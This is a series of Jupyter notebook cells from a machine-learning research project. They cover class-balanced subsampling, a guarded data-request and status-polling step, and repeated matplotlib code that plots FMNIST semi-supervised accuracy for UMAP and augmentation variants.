        # CONFIG is assumed to be defined earlier in the notebook, e.g. CONFIG = {'seed': 42}
        subsample = df[df['y'] == y].sample(n=n, random_state=CONFIG['seed'])
        list_of_dataframes.append(subsample)
    res = pd.concat(list_of_dataframes)
    return res

df_mini = random_balance_subset(df)
df_mini['y'].value_counts()
###Output
_____no_output_____
###Markdown Convert dataframe to CSV ###Code
df.to_csv('train_mini.csv')
###Output
_____no_output_____
###Markdown Reset the index ###Code
df.reset_index(drop=True, inplace=True)
###Output
_____no_output_____
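###Markdown A toy check of `random_balance_subset` (hypothetical data; assumes `CONFIG = {'seed': 0}` for reproducibility): ###Code
import pandas as pd

CONFIG = {'seed': 0}
toy = pd.DataFrame({'y': [0] * 5 + [1] * 5, 'x': range(10)})
balanced = random_balance_subset(toy, n=2)
print(balanced['y'].value_counts())  # expect exactly 2 rows of each class
###Output
_____no_output_____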
notebooks/E_datarequest.ipynb
###Markdown WARNING Data request lines are commented out to prevent accidental resubmission when running through the entire notebook quickly. ###Code
print(data_request_url)

# Data Request Line (kept commented out, per the warning above; uncomment to resubmit)
# r = requests.get(data_request_url, params=params, auth=(username, token))
# data = r.json()

%%time
check_complete = data['allURLs'][1] + '/status.txt'
for i in range(1800):
    r = requests.get(check_complete)
    if r.status_code == requests.codes.ok:
        print('request completed')
        break
    else:
        time.sleep(1)

print(data['allURLs'][0])
###Output
_____no_output_____
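###Markdown The polling pattern above can be wrapped in a small helper (a sketch; it reuses only the `requests` and `time` calls already shown): ###Code
def wait_for_request(status_url, timeout_s=1800):
    """Poll status.txt once per second until the request completes or times out."""
    for _ in range(timeout_s):
        if requests.get(status_url).status_code == requests.codes.ok:
            return True
        time.sleep(1)
    return False

# usage: wait_for_request(data['allURLs'][1] + '/status.txt')
###Output
_____no_output_____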
notebooks/semisupervised/FMNIST/fmnist-plot-results.ipynb
###Markdown View UMAP results for baseline ###Code
import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt

from tfumap.paths import FIGURE_DIR, save_fig
from tfumap.paths import MODEL_DIR
from tfumap.semisupervised_keras import pretrained_networks

dataset = "fmnist"
datasets = [dataset]
aug_types = [
    "not_augmented",
    "umap_euclidean",
    "umap_learned",
    "augmented",
    "umap_augmented_learned",
    "umap_euclidean_augmented",
    "umap_over_z"
]
dset_sizes = [4, 16, 64, 256, 1024, "full"]
results_loc = MODEL_DIR / 'semisupervised-keras'
results_df = pd.DataFrame(columns=['dataset', 'labels_per_class', 'augmented', 'timestamp', 'location', 'test_acc', 'dset_size_title'])
for dataset in datasets:
    for aug_type in aug_types:
        for dset_size in dset_sizes:
            dset_timestamp = pretrained_networks[dataset][aug_type][dset_size]
            dset_loc = results_loc / dataset / str(dset_size) / dset_timestamp
            loc_list = list(dset_loc.glob('test_loss.npy'))
            if dset_size == 'full':
                if aug_type == 'augmented':
                    print(loc_list)
                    print(aug_type)
            if len(loc_list) == 0:
                print(aug_type, dset_size, dataset, dset_loc)
                continue
            test_loss, test_acc = np.load(loc_list[0])
            dset_size_title = str(dset_size)
            # '!=' rather than 'is not': identity comparison against a string literal is fragile
            dset_size = str(dset_size) if dset_size != 'full' else 4096
            results_df.loc[len(results_df)] = [
                dataset,
                dset_size,
                aug_type,
                dset_timestamp,
                dset_loc,
                test_acc,
                dset_size_title
            ]
results_df
pal = sns.color_palette('tab20c',20)
sns.palplot(pal)
color_list = [
    {
        "mask": results_df.augmented == 'not_augmented',
        "color": pal[16],
        "ls": 'solid',
        "marker": 'o',
        "label": "Baseline"
    },
    {
        "mask": results_df.augmented == 'umap_euclidean',
        "color": pal[0],
        "ls": 'solid',
        "marker": 'o',
        "label": "+ UMAP (euclidean)"
    },
]
alpha = 0.75
linewidth = 2
fig, (ax, ax2) = plt.subplots(
    1, 2, figsize=(5, 5), dpi=100, sharey=True,
    gridspec_kw={"width_ratios": [5, 1], "wspace": 0.05},
)
for li, col_dict in enumerate(color_list):
    mask = col_dict["mask"]
    color = col_dict['color']
    ls = col_dict['ls']
    label = col_dict['label']
    marker = col_dict['marker']
    subset_ds = results_df[mask]
    subset_ds = subset_ds[subset_ds.dset_size_title != "full"]
    nex = subset_ds.labels_per_class.values.astype("int")
    acc = subset_ds.test_acc.values
    ax.scatter(nex, 1-acc, color=color, s=50, alpha=1, marker=marker)#, facecolors="none")
    ax.plot(nex, 1-acc, linewidth=linewidth, alpha=alpha, color=color, ls=ls) # , label = label
    subset_ds = results_df[mask]
    subset_ds = subset_ds[subset_ds.dset_size_title == "full"]
    #display(subset_ds)
    nex = subset_ds.labels_per_class.values.astype("int")
    acc = subset_ds.test_acc.values
    nex = nex + li/100 - len(color_list)/2/100#+(np.random.rand(1)-0.5)*.025
    ax2.scatter(nex, 1-acc, color=color, s=50, alpha=1, marker=marker)#, facecolors="none")
    ax.plot(
        [], [], "-" + marker, color=color, linewidth=linewidth, label=label,
        alpha=alpha, markersize=7,
        #markerfacecolor="none",
        ls=ls,
    )
ax.set_xscale("log")
ax.set_xticks([4, 16, 64, 256, 1024])
ax.set_xticklabels([4, 16, 64, 256, 1024])
#ax.set_ylim([0, 1])
ax.spines["right"].set_visible(False)
ax.legend()
ax.set_xlim([2, 2048])
# ax2.set_xscale('log')
ax2.set_xticks([4096])
ax2.set_xticklabels(["full"])
ax2.spines["left"].set_visible(False)
ax2.yaxis.tick_right()
d = 0.015  # how big to make the diagonal lines in axes coordinates
# arguments to pass plot, just so we don't keep repeating them
kwargs = dict(transform=ax.transAxes, color="k", clip_on=False)
ax.plot((1 - d, 1 + d), (-d, +d), **kwargs)
ax.plot((1 - d, 1 + d), (1 - d, 1 + d), **kwargs)
d = 0.015
offset = 5
kwargs.update(transform=ax2.transAxes)  # switch to the bottom axes
ax2.plot((-d * offset, +d * offset), (1 - d, 1 + d), **kwargs)
ax2.plot((-d * offset, +d * offset), (-d, +d), **kwargs)
ax.minorticks_on()
ax.tick_params(axis="y", which="minor", direction="out")
if False:
    ax.grid(axis="y", which="major", linestyle="-", alpha=0.5)
    ax.grid(axis="y", which="minor", linestyle="--", alpha=0.5)
    ax2.grid(axis="y", which="major", linestyle="-", alpha=0.5)
    ax2.grid(axis="y", which="minor", linestyle="--", alpha=0.5)
if False:
    ax.set_ylim([5e-2, 1])
    ax2.set_yscale('log')
ax.set_title(dataset.upper())  # this notebook is FMNIST; the hard-coded 'CIFAR10' title was a copy-paste slip
ax.set_ylabel('Classification Error')
ax.set_xlabel('# Training Examples')
color_list = [
    {
        "mask": results_df.augmented == 'not_augmented',
        "color": pal[16],
        "ls": 'solid',
        "marker": 'o',
        "label": "Baseline"
    },
    {
        "mask": results_df.augmented == 'umap_euclidean',
        "color": pal[0],
        "ls": 'solid',
        "marker": 'o',
        "label": "+ UMAP (Euclidean)"
    },
]
alpha = 0.75
linewidth = 2
fig, (ax, ax2) = plt.subplots(
    1, 2, figsize=(5, 3), dpi=100, sharey=True,
    gridspec_kw={"width_ratios": [5, 1], "wspace": 0.05},
)
for li, col_dict in enumerate(color_list):
    mask = col_dict["mask"]
    color = col_dict['color']
    ls = col_dict['ls']
    label = col_dict['label']
    marker = col_dict['marker']
    subset_ds = results_df[mask]
    subset_ds = subset_ds[subset_ds.dset_size_title != "full"]
    nex = subset_ds.labels_per_class.values.astype("int")
    acc = subset_ds.test_acc.values
    ax.scatter(nex, acc, color=color, s=50, alpha=1, marker=marker)#, facecolors="none")
    ax.plot(nex, acc, linewidth=linewidth, alpha=alpha, color=color, ls=ls) # , label = label
    subset_ds = results_df[mask]
    subset_ds = subset_ds[subset_ds.dset_size_title == "full"]
    #display(subset_ds)
    nex = subset_ds.labels_per_class.values.astype("int")
    acc = subset_ds.test_acc.values
    nex = nex + li/100 - len(color_list)/2/100#+(np.random.rand(1)-0.5)*.025
    ax2.scatter(nex, acc, color=color, s=50, alpha=1, marker=marker)#, facecolors="none")
    ax.plot(
        [], [], "-" + marker, color=color, linewidth=linewidth, label=label,
        alpha=alpha, markersize=7,
        #markerfacecolor="none",
        ls=ls,
    )
ax.set_xscale("log")
ax.set_xticks([4, 16, 64, 256, 1024])
ax.set_xticklabels([4, 16, 64, 256, 1024])
#ax.set_ylim([0, 1])
ax.spines["right"].set_visible(False)
ax.legend()
ax.set_xlim([2, 2048])
# ax2.set_xscale('log')
ax2.set_xticks([4096])
ax2.set_xticklabels(["full"])
ax2.spines["left"].set_visible(False)
ax2.yaxis.tick_right()
d = 0.015  # how big to make the diagonal lines in axes coordinates
# arguments to pass plot, just so we don't keep repeating them
kwargs = dict(transform=ax.transAxes, color="k", clip_on=False)
ax.plot((1 - d, 1 + d), (-d, +d), **kwargs)
ax.plot((1 - d, 1 + d), (1 - d, 1 + d), **kwargs)
d = 0.015
offset = 5
kwargs.update(transform=ax2.transAxes) # switch to the bottom axes ax2.plot((-d * offset, +d * offset), (1 - d, 1 + d), **kwargs) ax2.plot((-d * offset, +d * offset), (-d, +d), **kwargs) ax.minorticks_on() ax.tick_params(axis="y", which="minor", direction="out") if False: ax.grid(axis="y", which="major", linestyle="-", alpha=0.5) ax.grid(axis="y", which="minor", linestyle="--", alpha=0.5) ax2.grid(axis="y", which="major", linestyle="-", alpha=0.5) ax2.grid(axis="y", which="minor", linestyle="--", alpha=0.5) if False: ax.set_ylim([5e-2, 1]) ax2.set_yscale('log') ax.set_title('CIFAR10') ax.set_ylabel('Classification Error') ax.set_xlabel('# Training Examples') color_list = [ { "mask": results_df.augmented == 'not_augmented', "color": pal[16], "ls": 'solid', "marker": 'o', "label": "Baseline" }, { "mask": results_df.augmented == 'umap_euclidean', "color": pal[0], "ls": 'solid', "marker": 'o', "label": "+ UMAP (Euclidean)" }, ] alpha = 0.75 linewidth = 2 fig, (ax, ax2) = plt.subplots( 1, 2, figsize=(5, 3), dpi=100, sharey=True, gridspec_kw={"width_ratios": [5, 1], "wspace": 0.05}, ) for li, col_dict in enumerate(color_list): mask = col_dict["mask"] color = col_dict['color'] ls = col_dict['ls'] label = col_dict['label'] marker = col_dict['marker'] subset_ds = results_df[mask] subset_ds = subset_ds[subset_ds.dset_size_title != "full"] nex = subset_ds.labels_per_class.values.astype("int") acc = subset_ds.test_acc.values ax.scatter(nex, acc, color=color, s=50, alpha=1, marker=marker)#, facecolors="none") ax.plot(nex, acc, linewidth=linewidth, alpha=alpha, color=color, ls=ls) # , label = label subset_ds = results_df[mask] subset_ds = subset_ds[subset_ds.dset_size_title == "full"] #display(subset_ds) nex = subset_ds.labels_per_class.values.astype("int") acc = subset_ds.test_acc.values nex = nex + li/100 - len(color_list)/2/100#+(np.random.rand(1)-0.5)*.025 ax2.scatter(nex, acc, color=color, s=50, alpha=1, marker=marker)#, facecolors="none") ax.plot( [], [], "-" + marker, color=color, linewidth=linewidth, label=label, alpha=alpha, markersize=7, #markerfacecolor="none", ls=ls, ) ax.set_xscale("log") ax.set_xticks([4, 16, 64, 256, 1024]) ax.set_xticklabels([4, 16, 64, 256, 1024]) #ax.set_ylim([0, 1]) ax.spines["right"].set_visible(False) ax.legend() ax.set_xlim([2, 2048]) # ax2.set_xscale('log') ax2.set_xticks([4096]) ax2.set_xticklabels(["full"]) ax2.spines["left"].set_visible(False) ax2.yaxis.tick_right() d = 0.015 # how big to make the diagonal lines in axes coordinates # arguments to pass plot, just so we don't keep repeating them kwargs = dict(transform=ax.transAxes, color="k", clip_on=False) ax.plot((1 - d, 1 + d), (-d, +d), **kwargs) ax.plot((1 - d, 1 + d), (1 - d, 1 + d), **kwargs) d = 0.015 offset = 5 kwargs.update(transform=ax2.transAxes) # switch to the bottom axes ax2.plot((-d * offset, +d * offset), (1 - d, 1 + d), **kwargs) ax2.plot((-d * offset, +d * offset), (-d, +d), **kwargs) ax.minorticks_on() ax.tick_params(axis="y", which="minor", direction="out") if False: ax.grid(axis="y", which="major", linestyle="-", alpha=0.5) ax.grid(axis="y", which="minor", linestyle="--", alpha=0.5) ax2.grid(axis="y", which="major", linestyle="-", alpha=0.5) ax2.grid(axis="y", which="minor", linestyle="--", alpha=0.5) if False: ax.set_ylim([5e-2, 1]) ax2.set_yscale('log') ax.set_title(dataset.upper(), x=0.605) ax.set_ylabel('Accuracy') ax.set_xlabel('# Training Examples', x=0.605) #save_fig(FIGURE_DIR/(dataset + '_umap_euclidean'), save_pdf = True) color_list = [ { "mask": results_df.augmented == 
'not_augmented', "color": pal[16], "ls": 'solid', "marker": 'o', "label": "Baseline" }, { "mask": results_df.augmented == 'umap_learned', "color": pal[4], "ls": 'solid', "marker": 'o', "label": "+ UMAP (learned)" }, ] alpha = 0.75 linewidth = 2 fig, (ax, ax2) = plt.subplots( 1, 2, figsize=(5, 3), dpi=100, sharey=True, gridspec_kw={"width_ratios": [5, 1], "wspace": 0.05}, ) for li, col_dict in enumerate(color_list): mask = col_dict["mask"] color = col_dict['color'] ls = col_dict['ls'] label = col_dict['label'] marker = col_dict['marker'] subset_ds = results_df[mask] subset_ds = subset_ds[subset_ds.dset_size_title != "full"] nex = subset_ds.labels_per_class.values.astype("int") acc = subset_ds.test_acc.values ax.scatter(nex, acc, color=color, s=50, alpha=1, marker=marker)#, facecolors="none") ax.plot(nex, acc, linewidth=linewidth, alpha=alpha, color=color, ls=ls) # , label = label subset_ds = results_df[mask] subset_ds = subset_ds[subset_ds.dset_size_title == "full"] #display(subset_ds) nex = subset_ds.labels_per_class.values.astype("int") acc = subset_ds.test_acc.values nex = nex + li/100 - len(color_list)/2/100#+(np.random.rand(1)-0.5)*.025 ax2.scatter(nex, acc, color=color, s=50, alpha=1, marker=marker)#, facecolors="none") ax.plot( [], [], "-" + marker, color=color, linewidth=linewidth, label=label, alpha=alpha, markersize=7, #markerfacecolor="none", ls=ls, ) ax.set_xscale("log") ax.set_xticks([4, 16, 64, 256, 1024]) ax.set_xticklabels([4, 16, 64, 256, 1024]) #ax.set_ylim([0, 1]) ax.spines["right"].set_visible(False) ax.legend() ax.set_xlim([2, 2048]) # ax2.set_xscale('log') ax2.set_xticks([4096]) ax2.set_xticklabels(["full"]) ax2.spines["left"].set_visible(False) ax2.yaxis.tick_right() d = 0.015 # how big to make the diagonal lines in axes coordinates # arguments to pass plot, just so we don't keep repeating them kwargs = dict(transform=ax.transAxes, color="k", clip_on=False) ax.plot((1 - d, 1 + d), (-d, +d), **kwargs) ax.plot((1 - d, 1 + d), (1 - d, 1 + d), **kwargs) d = 0.015 offset = 5 kwargs.update(transform=ax2.transAxes) # switch to the bottom axes ax2.plot((-d * offset, +d * offset), (1 - d, 1 + d), **kwargs) ax2.plot((-d * offset, +d * offset), (-d, +d), **kwargs) ax.minorticks_on() ax.tick_params(axis="y", which="minor", direction="out") if False: ax.grid(axis="y", which="major", linestyle="-", alpha=0.5) ax.grid(axis="y", which="minor", linestyle="--", alpha=0.5) ax2.grid(axis="y", which="major", linestyle="-", alpha=0.5) ax2.grid(axis="y", which="minor", linestyle="--", alpha=0.5) if False: ax.set_ylim([5e-2, 1]) ax2.set_yscale('log') ax.set_title(dataset.upper(), x=0.605) ax.set_ylabel('Classification Acc.') ax.set_xlabel('# Training Examples', x=0.605) color_list = [ { "mask": results_df.augmented == 'not_augmented', "color": pal[16], "ls": 'solid', "marker": 'o', "label": "Baseline" }, { "mask": results_df.augmented == 'umap_learned', "color": pal[4], "ls": 'solid', "marker": 'o', "label": "+ UMAP (learned)" }, { "mask": results_df.augmented == 'umap_intersection', "color": pal[8], "ls": 'solid', "marker": 'o', "label": "+ UMAP (intersection)" }, { "mask": results_df.augmented == 'umap_euclidean', "color": pal[0], "ls": 'solid', "marker": 'o', "label": "+ UMAP (Euclidean)" }, ] alpha = 0.75 linewidth = 2 fig, (ax, ax2) = plt.subplots( 1, 2, figsize=(5, 3), dpi=100, sharey=True, gridspec_kw={"width_ratios": [5, 1], "wspace": 0.05}, ) for li, col_dict in enumerate(color_list): mask = col_dict["mask"] color = col_dict['color'] ls = col_dict['ls'] label = col_dict['label'] 
marker = col_dict['marker'] subset_ds = results_df[mask] subset_ds = subset_ds[subset_ds.dset_size_title != "full"] nex = subset_ds.labels_per_class.values.astype("int") acc = subset_ds.test_acc.values ax.scatter(nex, acc, color=color, s=50, alpha=1, marker=marker)#, facecolors="none") ax.plot(nex, acc, linewidth=linewidth, alpha=alpha, color=color, ls=ls) # , label = label subset_ds = results_df[mask] subset_ds = subset_ds[subset_ds.dset_size_title == "full"] #display(subset_ds) nex = subset_ds.labels_per_class.values.astype("int") acc = subset_ds.test_acc.values nex = nex + li/100 - len(color_list)/2/100#+(np.random.rand(1)-0.5)*.025 ax2.scatter(nex, acc, color=color, s=50, alpha=1, marker=marker)#, facecolors="none") ax.plot( [], [], "-" + marker, color=color, linewidth=linewidth, label=label, alpha=alpha, markersize=7, #markerfacecolor="none", ls=ls, ) ax.set_xscale("log") ax.set_xticks([4, 16, 64, 256, 1024]) ax.set_xticklabels([4, 16, 64, 256, 1024]) #ax.set_ylim([0, 1]) ax.spines["right"].set_visible(False) ax.legend() ax.set_xlim([2, 2048]) # ax2.set_xscale('log') ax2.set_xticks([4096]) ax2.set_xticklabels(["full"]) ax2.spines["left"].set_visible(False) ax2.yaxis.tick_right() d = 0.015 # how big to make the diagonal lines in axes coordinates # arguments to pass plot, just so we don't keep repeating them kwargs = dict(transform=ax.transAxes, color="k", clip_on=False) ax.plot((1 - d, 1 + d), (-d, +d), **kwargs) ax.plot((1 - d, 1 + d), (1 - d, 1 + d), **kwargs) d = 0.015 offset = 5 kwargs.update(transform=ax2.transAxes) # switch to the bottom axes ax2.plot((-d * offset, +d * offset), (1 - d, 1 + d), **kwargs) ax2.plot((-d * offset, +d * offset), (-d, +d), **kwargs) ax.minorticks_on() ax.tick_params(axis="y", which="minor", direction="out") if False: ax.grid(axis="y", which="major", linestyle="-", alpha=0.5) ax.grid(axis="y", which="minor", linestyle="--", alpha=0.5) ax2.grid(axis="y", which="major", linestyle="-", alpha=0.5) ax2.grid(axis="y", which="minor", linestyle="--", alpha=0.5) if False: ax.set_ylim([5e-2, 1]) ax2.set_yscale('log') ax.set_title(dataset.upper(), x=0.605) ax.set_ylabel('Classification Acc.') ax.set_xlabel('# Training Examples', x=0.605) color_list = [ { "mask": results_df.augmented == 'not_augmented', "color": pal[16], "ls": 'solid', "marker": 'o', "label": "Baseline" }, { "mask": results_df.augmented == 'augmented', "color": pal[16], "ls": 'dashed', "marker": 'X', "label": "+ Aug." 
}, { "mask": results_df.augmented == 'umap_augmented_learned', "color": pal[4], "ls": 'dashed', "marker": 'X', "label": "+Aug + UMAP (learned)" }, { "mask": results_df.augmented == 'umap_learned', "color": pal[4], "ls": 'solid', "marker": 'o', "label": "+ UMAP (learned)" }, ] alpha = 0.75 linewidth = 2 fig, (ax, ax2) = plt.subplots( 1, 2, figsize=(5, 3), dpi=100, sharey=True, gridspec_kw={"width_ratios": [5, 1], "wspace": 0.05}, ) for li, col_dict in enumerate(color_list): mask = col_dict["mask"] color = col_dict['color'] ls = col_dict['ls'] label = col_dict['label'] marker = col_dict['marker'] subset_ds = results_df[mask] subset_ds = subset_ds[subset_ds.dset_size_title != "full"] nex = subset_ds.labels_per_class.values.astype("int") acc = subset_ds.test_acc.values ax.scatter(nex, acc, color=color, s=50, alpha=1, marker=marker)#, facecolors="none") ax.plot(nex, acc, linewidth=linewidth, alpha=alpha, color=color, ls=ls) # , label = label subset_ds = results_df[mask] subset_ds = subset_ds[subset_ds.dset_size_title == "full"] #display(subset_ds) nex = subset_ds.labels_per_class.values.astype("int") acc = subset_ds.test_acc.values nex = nex + li/100 - len(color_list)/2/100#+(np.random.rand(1)-0.5)*.025 ax2.scatter(nex, acc, ls=ls, color=color, s=50, alpha=1, marker=marker)#, facecolors="none") ax.plot( [], [], "-" + marker, color=color, linewidth=linewidth, label=label, alpha=alpha, markersize=7, #markerfacecolor="none", ls=ls, ) ax.set_xscale("log") ax.set_xticks([4, 16, 64, 256, 1024]) ax.set_xticklabels([4, 16, 64, 256, 1024]) #ax.set_ylim([0, 1]) ax.spines["right"].set_visible(False) ax.legend() ax.set_xlim([2, 2048]) # ax2.set_xscale('log') ax2.set_xticks([4096]) ax2.set_xticklabels(["full"]) ax2.spines["left"].set_visible(False) ax2.yaxis.tick_right() d = 0.015 # how big to make the diagonal lines in axes coordinates # arguments to pass plot, just so we don't keep repeating them kwargs = dict(transform=ax.transAxes, color="k", clip_on=False) ax.plot((1 - d, 1 + d), (-d, +d), **kwargs) ax.plot((1 - d, 1 + d), (1 - d, 1 + d), **kwargs) d = 0.015 offset = 5 kwargs.update(transform=ax2.transAxes) # switch to the bottom axes ax2.plot((-d * offset, +d * offset), (1 - d, 1 + d), **kwargs) ax2.plot((-d * offset, +d * offset), (-d, +d), **kwargs) ax.minorticks_on() ax.tick_params(axis="y", which="minor", direction="out") if False: ax.grid(axis="y", which="major", linestyle="-", alpha=0.5) ax.grid(axis="y", which="minor", linestyle="--", alpha=0.5) ax2.grid(axis="y", which="major", linestyle="-", alpha=0.5) ax2.grid(axis="y", which="minor", linestyle="--", alpha=0.5) if False: ax.set_ylim([5e-2, 1]) ax2.set_yscale('log') ax.set_title(dataset.upper(), x=0.605) ax.set_ylabel('Classification Acc.') ax.set_xlabel('# Training Examples', x=0.605) ymin, ymax = ax.get_ylim() ymax = 1 ax.set_ylim([ymin, ymax]) color_list = [ { "mask": results_df.augmented == 'not_augmented', "color": pal[16], "ls": 'solid', "marker": 'o', "label": "Baseline" }, { "mask": results_df.augmented == 'augmented', "color": pal[16], "ls": 'dashed', "marker": 'X', "label": "+ Aug." 
},
    {
        "mask": results_df.augmented == 'umap_augmented_learned',
        "color": pal[4],
        "ls": 'dashed',
        "marker": 'X',
        "label": "+Aug + UMAP (learned)"
    },
    #{
    #    "mask": results_df.augmented == 'umap_learned',
    #    "color": pal[4],
    #    "ls": 'solid',
    #    "marker": 'o',
    #    "label": "+ UMAP (learned)"
    #},
]
alpha = 0.75
linewidth = 2
fig, (ax, ax2) = plt.subplots(
    1, 2, figsize=(5, 3), dpi=100, sharey=True,
    gridspec_kw={"width_ratios": [5, 1], "wspace": 0.05},
)
for li, col_dict in enumerate(color_list):
    mask = col_dict["mask"]
    color = col_dict['color']
    ls = col_dict['ls']
    label = col_dict['label']
    marker = col_dict['marker']
    subset_ds = results_df[mask]
    subset_ds = subset_ds[subset_ds.dset_size_title != "full"]
    nex = subset_ds.labels_per_class.values.astype("int")
    acc = subset_ds.test_acc.values
    ax.scatter(nex, acc, color=color, s=50, alpha=1, marker=marker)#, facecolors="none")
    ax.plot(nex, acc, linewidth=linewidth, alpha=alpha, color=color, ls=ls) # , label = label
    subset_ds = results_df[mask]
    subset_ds = subset_ds[subset_ds.dset_size_title == "full"]
    #display(subset_ds)
    nex = subset_ds.labels_per_class.values.astype("int")
    acc = subset_ds.test_acc.values
    nex = nex + li/100 - len(color_list)/2/100#+(np.random.rand(1)-0.5)*.025
    ax2.scatter(nex, acc, ls=ls, color=color, s=50, alpha=1, marker=marker)#, facecolors="none")
    ax.plot(
        [], [], "-" + marker, color=color, linewidth=linewidth, label=label,
        alpha=alpha, markersize=7,
        #markerfacecolor="none",
        ls=ls,
    )
ax.set_xscale("log")
ax.set_xticks([4, 16, 64, 256, 1024])
ax.set_xticklabels([4, 16, 64, 256, 1024])
#ax.set_ylim([0, 1])
ax.spines["right"].set_visible(False)
ax.legend()
ax.set_xlim([2, 2048])
# ax2.set_xscale('log')
ax2.set_xticks([4096])
ax2.set_xticklabels(["full"])
ax2.spines["left"].set_visible(False)
ax2.yaxis.tick_right()
d = 0.015  # how big to make the diagonal lines in axes coordinates
# arguments to pass plot, just so we don't keep repeating them
kwargs = dict(transform=ax.transAxes, color="k", clip_on=False)
ax.plot((1 - d, 1 + d), (-d, +d), **kwargs)
ax.plot((1 - d, 1 + d), (1 - d, 1 + d), **kwargs)
d = 0.015
offset = 5
kwargs.update(transform=ax2.transAxes)  # switch to the bottom axes
ax2.plot((-d * offset, +d * offset), (1 - d, 1 + d), **kwargs)
ax2.plot((-d * offset, +d * offset), (-d, +d), **kwargs)
ax.minorticks_on()
ax.tick_params(axis="y", which="minor", direction="out")
if False:
    ax.grid(axis="y", which="major", linestyle="-", alpha=0.5)
    ax.grid(axis="y", which="minor", linestyle="--", alpha=0.5)
    ax2.grid(axis="y", which="major", linestyle="-", alpha=0.5)
    ax2.grid(axis="y", which="minor", linestyle="--", alpha=0.5)
if False:
    ax.set_ylim([5e-2, 1])
    ax2.set_yscale('log')
ax.set_title(dataset.upper(), x=0.605)
ax.set_ylabel('Classification Acc.')
ax.set_xlabel('# Training Examples', x=0.605)
color_list = [
    {
        "mask": results_df.augmented == 'not_augmented',
        "color": pal[16],
        "ls": 'solid',
        "marker": 'o',
        "label": "Baseline"
    },
    {
        "mask": results_df.augmented == 'augmented',
        "color": pal[16],
        "ls": 'dashed',
        "marker": 'X',
        "label": "+ Aug."
    },
    #{
    #    "mask": results_df.augmented == 'umap_euclidean',
    #    "color": pal[0],
    #    "ls": 'solid',
    #    "marker": 'o',
    #    "label": "+ UMAP (Euclidean)"
    #},
    {
        "mask": results_df.augmented == 'umap_euclidean_augmented',
        "color": pal[0],
        "ls": 'dashed',
        "marker": 'X',
        "label": "+ Aug. + UMAP (Euclidean)"
    },
]
alpha = 0.75
linewidth = 2
fig, (ax, ax2) = plt.subplots(
    1, 2, figsize=(5, 3), dpi=100, sharey=True,
    gridspec_kw={"width_ratios": [5, 1], "wspace": 0.05},
)
for li, col_dict in enumerate(color_list):
    mask = col_dict["mask"]
    color = col_dict['color']
    ls = col_dict['ls']
    label = col_dict['label']
    marker = col_dict['marker']
    subset_ds = results_df[mask]
    subset_ds = subset_ds[subset_ds.dset_size_title != "full"]
    nex = subset_ds.labels_per_class.values.astype("int")
    acc = subset_ds.test_acc.values
    ax.scatter(nex, acc, color=color, s=50, alpha=1, marker=marker)#, facecolors="none")
    ax.plot(nex, acc, linewidth=linewidth, alpha=alpha, color=color, ls=ls) # , label = label
    subset_ds = results_df[mask]
    subset_ds = subset_ds[subset_ds.dset_size_title == "full"]
    #display(subset_ds)
    nex = subset_ds.labels_per_class.values.astype("int")
    acc = subset_ds.test_acc.values
    nex = nex + li/100 - len(color_list)/2/100#+(np.random.rand(1)-0.5)*.025
    ax2.scatter(nex, acc, ls=ls, color=color, s=50, alpha=1, marker=marker)#, facecolors="none")
    ax.plot(
        [], [], "-" + marker, color=color, linewidth=linewidth, label=label,
        alpha=alpha, markersize=7,
        #markerfacecolor="none",
        ls=ls,
    )
ax.set_xscale("log")
ax.set_xticks([4, 16, 64, 256, 1024])
ax.set_xticklabels([4, 16, 64, 256, 1024])
#ax.set_ylim([0, 1])
ax.spines["right"].set_visible(False)
ax.legend()
ax.set_xlim([2, 2048])
# ax2.set_xscale('log')
ax2.set_xticks([4096])
ax2.set_xticklabels(["full"])
ax2.spines["left"].set_visible(False)
ax2.yaxis.tick_right()
d = 0.015  # how big to make the diagonal lines in axes coordinates
# arguments to pass plot, just so we don't keep repeating them
kwargs = dict(transform=ax.transAxes, color="k", clip_on=False)
ax.plot((1 - d, 1 + d), (-d, +d), **kwargs)
ax.plot((1 - d, 1 + d), (1 - d, 1 + d), **kwargs)
d = 0.015
offset = 5
kwargs.update(transform=ax2.transAxes)  # switch to the bottom axes
ax2.plot((-d * offset, +d * offset), (1 - d, 1 + d), **kwargs)
ax2.plot((-d * offset, +d * offset), (-d, +d), **kwargs)
ax.minorticks_on()
ax.tick_params(axis="y", which="minor", direction="out")
if False:
    ax.grid(axis="y", which="major", linestyle="-", alpha=0.5)
    ax.grid(axis="y", which="minor", linestyle="--", alpha=0.5)
    ax2.grid(axis="y", which="major", linestyle="-", alpha=0.5)
    ax2.grid(axis="y", which="minor", linestyle="--", alpha=0.5)
if False:
    ax.set_ylim([5e-2, 1])
    ax2.set_yscale('log')
ax.set_title(dataset.upper(), x=0.605)
ax.set_ylabel('Classification Acc.')
ax.set_xlabel('# Training Examples', x=0.605)
color_list = [
    {
        "mask": results_df.augmented == 'not_augmented',
        "color": pal[16],
        "ls": 'solid',
        "marker": 'o',
        "label": "Baseline"
    },
    {
        "mask": results_df.augmented == 'augmented',
        "color": pal[16],
        "ls": 'dashed',
        "marker": 'X',
        "label": "+ Aug."
    },
    {
        "mask": results_df.augmented == 'umap_euclidean',
        "color": pal[0],
        "ls": 'solid',
        "marker": 'o',
        "label": "+ UMAP (Euclidean)"
    },
    {
        "mask": results_df.augmented == 'umap_euclidean_augmented',
        "color": pal[0],
        "ls": 'dashed',
        "marker": 'X',
        "label": "+ Aug. + UMAP (Euclidean)"
    },
]
alpha = 0.75
linewidth = 2
fig, (ax, ax2) = plt.subplots(
    1, 2, figsize=(5, 3), dpi=100, sharey=True,
    gridspec_kw={"width_ratios": [5, 1], "wspace": 0.05},
)
for li, col_dict in enumerate(color_list):
    mask = col_dict["mask"]
    color = col_dict['color']
    ls = col_dict['ls']
    label = col_dict['label']
    marker = col_dict['marker']
    subset_ds = results_df[mask]
    subset_ds = subset_ds[subset_ds.dset_size_title != "full"]
    nex = subset_ds.labels_per_class.values.astype("int")
    acc = subset_ds.test_acc.values
    ax.scatter(nex, acc, color=color, s=50, alpha=1, marker=marker)#, facecolors="none")
    ax.plot(nex, acc, linewidth=linewidth, alpha=alpha, color=color, ls=ls) # , label = label
    subset_ds = results_df[mask]
    subset_ds = subset_ds[subset_ds.dset_size_title == "full"]
    #display(subset_ds)
    nex = subset_ds.labels_per_class.values.astype("int")
    acc = subset_ds.test_acc.values
    nex = nex + li/100 - len(color_list)/2/100#+(np.random.rand(1)-0.5)*.025
    ax2.scatter(nex, acc, ls=ls, color=color, s=50, alpha=1, marker=marker)#, facecolors="none")
    ax.plot(
        [], [], "-" + marker, color=color, linewidth=linewidth, label=label,
